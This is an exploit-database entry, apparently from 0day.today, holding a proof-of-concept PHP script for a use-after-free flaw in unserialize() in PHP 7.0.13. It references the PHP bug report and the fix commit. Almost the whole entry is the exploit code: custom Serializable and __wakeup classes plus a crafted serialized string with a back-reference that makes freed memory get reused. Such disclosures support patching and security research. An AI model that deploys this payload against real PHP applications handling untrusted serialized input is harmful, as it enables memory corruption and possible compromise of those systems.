PHP 7.0.13 Use After Free unserialize() PoC Exploit

PoC:

<?php

class obj1 implements Serializable {
var $data;
function serialize() {
return serialize($this->data);
}
function unserialize($data) {
$this->data = unserialize($data);
}
}

class obj2 {
var $ryat;
function __wakeup() {
$this->ryat = null;
}
}

$inner = 's:4:"ryat";';
$exploit = 'a:2:{i:0;C:4:"obj1":'.strlen($inner).':{'.$inner.'}i:1;O:4:"obj2":1:{s:4:"ryat";R:3;}}';
$data = unserialize($exploit);
for ($i = 0; $i < 5; $i++) {
$v[$i] = 'hi'.$i;
}
var_dump($data);

?>

References:

https://bugs.php.net/bug.php?id=72978
https://github.com/php/php-src/commit/b2af4e8868726a040234de113436c6e4f6372d17

#  0day.today [2018-01-04]  #